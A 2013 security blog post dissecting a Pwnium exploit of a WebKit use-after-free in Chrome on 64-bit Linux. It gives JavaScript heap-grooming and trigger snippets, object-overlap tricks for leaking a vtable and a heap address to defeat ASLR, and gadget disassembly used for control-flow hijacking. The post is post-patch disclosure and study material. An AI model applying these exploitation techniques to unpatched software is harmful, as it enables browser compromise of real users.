Sunday, February 3, 2013

Exploiting 64-bit Linux like a boss

Back in November 2012, a Chrome Releases blog post mysteriously stated: "Congratulations to Pinkie Pie for completing challenge: 64-bit exploit".

Chrome patches and autoupdates bugs pretty fast but this is a WebKit bug and not every consumer of WebKit patches bugs particularly quickly. So I've waited a few months to release a full breakdown of the exploit. The exploit is notable because it is against 64-bit Linux. 64-bit exploits are generally harder than 32-bit exploits for various reasons, including the fact that some types of heap sprays are off the table. On top of that, Linux ASLR is generally better than Windows ASLR (although not perfect). For example, Pinkie Pie's Pwnium 2 exploit defeated Win 7 ASLR by relying on a statically-addressed system object! That sort of nonsense is generally absent from Linux ASLR.

Without any further ado, I'll paste my raw notes from the exploit deconstruction below. The number of different techniques used and steps involved is quite impressive.

The bug
A single WebKit use-after-free bug was used to gain code execution. The logic flaw in WebKit was reasonably simple: when a WebCore::HTMLVideoElement is garbage collected, the base class member WebCore::HTMLMediaElement::m_player -- a WebCore::MediaPlayer -- is freed. A different object, a WebCore::MediaSource, holds a stale pointer to the freed WebCore::MediaPlayer. The stale pointer can be prodded indirectly via Javascript methods on either the JS MediaSource object, or JS SourceBuffer objects owned by the JS MediaSource.

The exploit
The exploit is moderately complicated, with multiple steps and techniques used. Pinkie Pie states that the complexity is warranted and generally caused by limited lack of control, and therefore limited options for making progress at each stage.

The exploit steps are as follows:

1. Allocate a large number of RTCIceCandidate objects (100000) and then unreference a small subset of them.
   tempia = new Uint32Array(176/4);
   rtcs = [];
   rtcstring = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
   rtcdesc = {'candidate': rtcstring, 'sdpMid': rtcstring}
   for(var i = 0; i < 100000; i++) {
       rtcs.push(new RTCIceCandidate(rtcdesc));
   for(var i = 0; i < 10000; i++) rtcs[i] = null;
   for(var i = 90000; i < 100000; i++) rtcs[i] = null;

This step indirectly creates a lot of WebCore::WebCoreStringResource (v8 specific) objects and a later garbage collection will free some subset of them.
These objects are 24 bytes in size (fitting into a tcmalloc slab of 32 byte sized allocations), so it means that any future 24 byte allocation has a large probability of being placed directly before a WebCore::WebCoreStringResource object. This is significant later.
A 176-byte sized buffer is also allocated.

2. Trigger free of MediaPlayer and the 176-byte sized buffer; allocate another MediaSource object.
   buffer = ms.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid = null;
   tempia = null;
   ms2 = new WebKitMediaSource();

   sbl = ms2.sourceBuffers;
The WebCore::MediaPlayer is 264 bytes in size (tcmalloc bucket 257 - 288). When it is freed, many child objects are also freed. The only important one is a 168 byte sized WebKit::WebMediaPlayerClientImpl object (tcmalloc bucket 161 - 176).
Allocation of the WebCore::MediaSource (176 bytes) also subsequently allocates a WebCore::SourceBufferList child object (168 bytes). The free of the temporary 176 byte buffer (tempia) is to ensure that its freed slot is used for the WebCore::MediaSource object, leaving the freed slot that was occupied by a WebKit::WebMediaPlayerClientImpl to be occupied by a new WebCore::SourceBufferList object.

3. Call vtable of freed WebMediaPlayerClientImpl.
   buffer.timestampOffset = 42; // free
In C++, this triggers the call chain WebCore::SourceBuffer -> WebCore::MediaSource -> WebCore::MediaPlayer -> (virtual) WebKit::WebMediaPlayerClientImpl.
You’ll notice that the call chain bounces through the WebCore::MediaPlayer, which is freed. However, the only access is to the WebCore::MediaPlayer::m_private member at offset 72. delete’ing the object only interferes with the first 16 bytes (on account of tcmalloc writing two freelist pointers) and the WebCore::MediaPlayer::m_mediaPlayerClient member. The WebCore::MediaPlayer free slot isn’t otherwise meaningfully re-used by this point.

What happens next is fascinating. WebCore::MediaPlayer::sourceSetTimestampOffset dissassembles to:
   0x00007f61a0ced4c0 <+0>: mov    rdi,QWORD PTR [rdi+0x48]
   0x00007f61a0ced4c4 <+4>: mov    rax,QWORD PTR [rdi]
   0x00007f61a0ced4c7 <+7>: mov    rax,QWORD PTR [rax+0x208]
   0x00007f61a0ced4ce <+14>: jmp    rax

This loads the vtable for the WebCore::MediaPlayer::m_private member and calls the vtable function at 0x208. WebCore::MediaPlayer::m_private is supposed to be a WebKit::WebMediaPlayerClientImpl object but a WebCore::SourceBufferList was overlayed there. WebCore::SourceBufferList objects have a vtable, but a much smaller one! Offset 0x208 in this vtable hits a vtable function in a totally different vtable, specifically WebCore::RefCountedSupplement::~RefCountedSupplement, which disassembles to:
   0x00007ffd9ec51e00 <+0>: lea    rax,[rip+0x3276969]
   0x00007ffd9ec51e07 <+7>: mov    QWORD PTR [rdi],rax
   0x00007ffd9ec51e0a <+10>: jmp    0x7ffd9e5b2c80 <

As these opcodes execute, rdi is a this pointer for a WebCore::SourceBufferList object (which the calling code believed was a this pointer to a WebKit::WebMediaPlayerClientImpl object). As you can see, the side effects of these opcodes are:
- Trash the vtable pointer of the WebCore::SourceBufferList object.
- Do a free(this), i.e free the WebCore::SourceBufferList object.
- Return cleanly to the caller.

4. Use HTML5 WebDatabase functionality to allocate a SQLStatement as a side effect.
   transaction.executeSql('derp', [], function() {}, function() {});
   slength = sbl.length;
A WebCore::SQLStatement object is 176 bytes in size. So it is allocated into the slot just vacated by free’ing the WebCore::SourceBufferList object in step 3 above. This is the same slot that we free’d the WebKit::WebMediaPlayerClientImpl from.
There are now two Javascript objects pointing to freed objects: a direct handle to a freed WebCore::SourceBufferList (sbl) and an indirect handle to a freed WebKit::WebMediaPlayerClientImpl (buffer).
At this time, a call is made in Javascript to sbl.length. It is not required for the exploit and nothing is done with the integer result, but looking at this call under the covers is instructive.
To return the length, a 64-bit size_t is read from offset 136 into the WebCore::SourceBufferList object. Since a WebCore::SQLStatement was put on top of the freed WebCore::SourceBufferList, the actual value read is a WebCore::SQLStatement::m_statementErrorCallbackWrapper::m_callback member pointer. Leaking this value to Javascript might be useful as it is a heap address. However, Javascript lengths are 32-bit so only the lower 32-bits of the address are leaked. The entropy that’s important for ASLR on 64-bit Linux is largely in the next 8 bits above the bottom 32 bits, so the heap address cannot be usefully leaked!
Exploitation of similar overlap situations would not be a problem on systems with 32-bit pointers.

5. Abuse overlapping fields in SourceBufferList vs. SQLStatement.
   sb = sbl[0xa8/8];
Next, the Javascript array index operator is used. At this time, the Javascript handle to the WebCore::SourceBufferList is actually backed by a WebCore::SQLStatement object at the C++ level. The WebCore::SourceBufferList::m_list member is a WTF::Vector and that starts with two important 64-bit fields: a length and a pointer to the underlying buffer.
As covered above, the length now maps to a pointer value. A pointer value, when treated as an integer, will be very large, effectively sizing the vector massively. And the vector’s underlying buffer pointer now maps to the member SQLStatement::m_statementErrorCallbackWrapper::m_scriptExecutionContext.

Therefore, the Javascript array operator on JS SourceBufferList will return a JS SourceBuffer object which is backed in C++ by a pointer pulled from somewhere in a C++ WebCore::ScriptExecutionContent object, depending on the array index.

The exploit uses array index 21, which corresponds to offset 168, or WebCore::ScriptExecutionContext::m_pendingExceptions. This is a pointer to a WTF::Vector. So, there is now a Javascript handle to a JS SourceBuffer object which is really backed by a WTF::Vector.

6. Read vtable value as a Javascript number.
   converterF64[0] = sb.timestampOffset;
In C++, the timestampOffset property is read from a 64-bit double at offset 32 of the WebCore::SourceBuffer object. The WebCore::SourceBuffer object is currently backed by a WTF::Vector object, which is 24 bytes in size and lives in a 32 byte tcmalloc slot. Therefore, a read at offset 32 will in fact read from the beginning of the next tcmalloc slot. Looking back to step 1, it was arranged to be likely that the adjacent 32 byte slot will contain a WebCore::WebCoreStringResource object. Therefore, the WebCore::WebCoreStringResource vtable is read and returned to Javascript as a number. Javascript numbers are 64-bit doubles so there are no truncation issues like those discussed with reading an integer length above in step 4.

That’s a lot of effort, but finally the exploit has leaked a vtable value to Javascript. For a given build of Chrome, it is now easy to calculate the exact address of all opcodes, functions, etc. in the binary.

7. Re-trigger use-after-free and back freed object with array buffer.
   buffer2 = ms3.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid2 = null;
   var ia = new Uint32Array(168/4);
   rtc2 = new webkitRTCPeerConnection({'iceServers': []});
This time, the freed WebKit::WebMediaPlayerClientImpl is replaced with a 168 raw byte buffer that can be read and written through Javascript. This is now a useful primitive because ASLR was defeated and a useful vtable pointer value can be put in the first 8 bytes of the raw byte buffer.
A WebCore::RTCPeerConnection is also allocated (264 bytes) to occupy the slot for the freed WebCore::MediaPlayer. This protects the freed WebCore::MediaPlayer from corruption. Significantly, it makes sure nothing overwrites the WebCore::MediaPlayer::m_private pointer. This pointer is needed intact. It is at offset 72 and WebCore::RTCPeerConnection does not overwrite that field during construction.

8. Leak address of a heap buffer under Javascript control.
   add64(converterI32, 0, converterI32, 0, -prepdata['found_vt']);
   add64(ia, 0, converterI32, 0, prepdata['mov_rdx_112_rdi_pp']);
   add64(ia, 0, ia, 0, -0x1e8);
   var ib8 = new Uint8Array(0x10000);
   var ib = new Uint32Array(ib8.buffer);
   var ibAddr = [ia[112/4], ia[112/4 + 1]];
Using knowledge of the binary layout, a vtable value is chosen that will result in the WebCore::MediaPlayer::sourceAppend vtable call site calling the function v8::internal::HStoreNamedField::SetSideEffectDominator. An appropriate function name. It disassembles to:
   0x00007f153efd7340 <+0>: mov    QWORD PTR [rdi+0x70],rdx
   0x00007f153efd7344 <+4>: ret    
As can be seen, the value of rdx (the 2nd non-this function parameter) is written to offset 112 of this. this is backed by a raw buffer pointer for the ia Javascript Uint32Array and rdx in the context of WebCore::MediaPlayer::sourceAppend is a raw buffer pointer for the ib Javscript Uint32Array.
Therefore, the address of a heap buffer under the control of Javascript has been leaked to Javascript.

9. Proceed as normal.
The exploit now has control over a vtable pointer. It can point the vtable pointer at a heap buffer where the contents can be controlled arbitrarily. The exploit is free to start ROP chains etc.
As it happens, the exploit payload is expressed in terms of valid full function calls. This is achieved by bouncing into a useful sequence of opcodes in a template base::internal::Invoker<3>:
   0x00007f153fc71d40 <+0>: mov    rax,rdi
   0x00007f153fc71d43 <+3>: lea    rcx,[rdi+0x30]
   0x00007f153fc71d47 <+7>: mov    rsi,QWORD PTR [rdi+0x20]
   0x00007f153fc71d4b <+11>: mov    rdx,QWORD PTR [rdi+0x28]
   0x00007f153fc71d4f <+15>: mov    rax,QWORD PTR [rax+0x10]
   0x00007f153fc71d53 <+19>: mov    rdi,QWORD PTR [rdi+0x18]
   0x00007f153fc71d57 <+23>: jmp    rax
As can be seen, these opcodes pull a jump target, a new this pointer and two function arguments from the current this pointer. A very useful construct.